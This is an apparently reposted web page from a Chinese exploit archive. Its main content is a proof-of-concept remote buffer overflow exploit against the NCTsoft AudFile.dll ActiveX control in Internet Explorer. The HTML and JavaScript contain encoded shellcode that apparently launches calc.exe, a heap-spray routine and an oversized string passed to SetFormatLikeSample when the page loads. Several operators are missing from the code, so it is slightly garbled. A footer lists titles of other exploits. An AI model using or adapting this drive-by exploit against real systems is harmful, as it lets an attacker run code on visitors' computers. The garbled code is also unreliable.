NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

所属分类：网络安全 / Exploit 阅读数： 202

收藏 0赞 0分享

-----------------------------------------------------------------------------
NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow
url: http://www.nctsoft.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
-----------------------------------------------------------------------------
<html>
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 5200;
var x = unescape("");
while (x.length<buffSize) x = x;
x = x.substring(0,buffSize);
boom.SetFormatLikeSample (x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide = sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize sizeHDM);
var heapBlocks = (heapSA heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i )
{
memory[i] = sSlide sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" codebase="http://shinnai.net/AudFile.dll">
Unable to create object
</object>
</body>
</html>

更多精彩内容其他人还在看

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer Recordset Double Free Memory Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Linux Kernel

MS Internet Explorer (FTP Server Response) DoS Exploit

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

网络赚钱

站长故事